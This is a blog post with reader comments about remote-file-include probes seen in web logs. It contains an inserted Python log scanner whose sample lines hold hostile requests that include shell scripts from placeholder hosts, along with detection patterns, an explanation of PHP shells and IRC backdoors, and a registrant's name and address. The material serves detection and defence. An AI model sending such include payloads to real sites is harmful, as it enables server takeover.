libwww-perl and exploits

I’ve noticed some URLs that are left in my logs. A path to my wiki, and then through some (working or not) redirect to somewhere else, that always ends in a ? I see many of those links in Google, so it’s possible the point is to get the URLs into statistics summary pages.
Here’s an image with the code I found when accessing one of those pages. Usually they end in a 404, as the owners of the servers realize what is going on (I assume), but sometimes I see the code. I’m wondering what this code does to someone who browses to that page.

Questionable code image

The user agent is always some permutation of libwww-perl and the page where the code is located often has the extension .txt, making it seem harmless. After having seen several of these pages, the code seems slightly different each time.
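The pattern described above (a remote URL stuffed into a query parameter, usually ending in a ?, pointing at a .txt file, fetched by a libwww-perl agent) can be picked out of an access log mechanically. The following Python is an added example, not code from the post or its commenters; the log lines are constructed for the demonstration and the IP addresses and hostnames are placeholders. It flags a request only when a parameter value is itself a remote URL, and then records the extra indicators that strengthen the match.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines (placeholder addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Nov/2007:10:12:01 +0000] "GET /wiki/index.php?page=http://example.invalid/tools/cmd.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [04/Nov/2007:10:12:02 +0000] "GET /blog/?p=http://example.invalid/r57.txt?? HTTP/1.1" 200 2048 "-" "libwww-perl/5.808"
198.51.100.22 - - [04/Nov/2007:10:15:33 +0000] "GET /wiki/index.php?page=Main_Page HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/2.0.0.8"
198.51.100.23 - - [04/Nov/2007:10:16:10 +0000] "GET /?igor-the-troll HTTP/1.1" 200 3000 "http://example.org/" "Mozilla/4.0 (compatible; MSIE 7.0)"
203.0.113.9 - - [04/Nov/2007:10:20:00 +0000] "GET /index.php?inc=ftp://203.0.113.9/shell.txt? HTTP/1.0" 404 300 "-" "Indy Library"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# User agents named in the post and its comments as typical of these crawlers.
SCANNER_UA_RE = re.compile(r'libwww-perl|Indy Library', re.IGNORECASE)

def rfi_indicators(line):
    """Return the reasons a log line looks like a remote-file-include probe (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    query = urlsplit(m.group('path')).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not REMOTE_RE.match(value):
            continue  # an ordinary parameter value, not a URL
        reasons.append(f"remote URL in parameter '{name}'")
        if value.endswith('?'):
            # The trailing '?' turns whatever the vulnerable script appends into a
            # harmless query string on the remote fetch, so the .txt is loaded as-is.
            reasons.append("trailing '?' on the remote URL")
        if urlsplit(value.rstrip('?')).path.lower().endswith('.txt'):
            reasons.append('remote file served as .txt')
    if reasons and SCANNER_UA_RE.search(m.group('ua')):
        reasons.append(f"scanner user agent: {m.group('ua')}")
    return reasons

def scan_log(text):
    """Return (client ip, request path, reasons) for every line that carries an RFI probe."""
    hits = []
    for line in text.splitlines():
        reasons = rfi_indicators(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group('ip'), m.group('path'), reasons))
    return hits

if __name__ == '__main__':
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path, '->', '; '.join(reasons))
```

Normal page views, including the bare "/?igor-the-troll" style request a commenter mentions below, produce no indicators, so the output is only the probing requests and the reasons each was flagged.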

I originally meant to only provide one example of code, but I’ve seen some that went even further, and I’ll try and give examples of those too.

Here’s one that seems extremely fishy. Although it’s a text file, be careful when opening it! I noticed that the file was last changed November 4. What’s interesting about this particular domain name is that a hacker left a message on another site with an e-mail address on that domain. And e-mail addresses from that domain have also been used for spam (not sure which type, since I can’t read the language of the site that collected those addresses).

Some other domains are on Yahoo’s servers (old Geocities, sometimes), and some of the sites appear to have been hacked. But the registration data seems wacked enough that I’m not sure. Here’s an example. That address doesn’t exist, and the phone number is from elsewhere in the US:

Domain Name………. baguscrew.net
Creation Date…….. 2007-10-24
Registration Date…. 2007-10-24
Expiry Date………. 2008-10-24
Organisation Name…. aris asmoro
Organisation Address. 565 ne norton ave
Organisation Address.
Organisation Address. bend
Organisation Address. 97701
Organisation Address. CO
Organisation Address. UNITED STATES

Here’s another code snippet.

5 Responses to “libwww-perl and exploits”

  1. Alden Says:

    I’ve been getting a lot of those types of hits, and have been trying, where I can, to inform the owners of the sites that they appear to have been hacked. Obviously the hackers aren’t monitoring the responses from the target servers, because all they’ve been getting from my sites are 404s. :P

  2. Roland Says:

    It’s a so-called “PHP shell” where you can enter Linux commands and then they will be executed on the targeted server. Damn script-kiddies… :(

  3. David Clarke Says:

    The scripts are served as text/plain, but in vulnerable configurations, they use a PHP Include() command to be incorporated.

    I’ve been noticing quite a few of these for some time - and reporting them to the site owners, most of whom have been co-operative.

    I’ve described some of this Script Kiddie activity on my blog at http://www.dragonthoughts.com

  4. Igor Berger Says:

    SpamHuntress, I always have an issue with how WordPress handles URL rewrites.
    http://spamhuntress.com/?igor-the-troll

    This should not work but it does! Not only can it be a Google duplication penalty for lower trust sites, but a public relations exploit for a brand if targeted by guerrilla warfare SEOs.

  5. admin Says:

    Lemat tried to post this, but it didn’t make it past the filters:

    This is a Mic22 type PHP injection script (also known as Remote File
    Include); it is used by the hackers to determine if the scanned website is
    vulnerable or not. There are a few types of script-kiddies:

    1) Lame: using c99, r57 type scripts to manually search and hack
    webservers, they try to use proxies to hide their IPs and free hostings to
    store their tools - sometimes along with a website “I’m the
    supermastahacker”. User Agent is usually a real browser - Firefox, Opera
    and IE (!). Not a real threat.

    2) Advanced: using Mic22 type, and a Perl backdoor used to connect the
    hacked webserver to the IRC server, where the hacker can run commands
    remotely. Usually the attacking IP is Brazilian: 200.0.0.0/7, 189.0.0.0/8.
    They store their tools on free hostings (like geocities) and previously
    hacked webservers. User Agent is usually “Indy Library” - they run
    Delphi-made crawlers on their home computers (Windows). IRC servers are:
    irc.indoirc.net, bots.crewchat.org, brasilcrew and many more. Major threat
    due to the amount of people. They usually “own” ~10-30 hacked webservers
    each.

    3) Pro: they run crawlers on hacked webservers - User Agent string is
    “libwww”. A major threat due to the amount of parallel Internet sweeps.

    4) Pro+: there is a service on a previously hacked webserver, usually
    listening at port 9991 instead of (or parallel to) the IRC server. I have
    seen a hacker named xeQt in February 2007 with ~100 webservers hacked
    during a weekend (2 days). Currently this is a rare species.

    There are lots of Brazilians and Indonesians, a few Italians, French, 3 were
    from Poland (yes, past tense). If you list channels on an IRC server take a
    look at “scan! bug dork” descriptions.
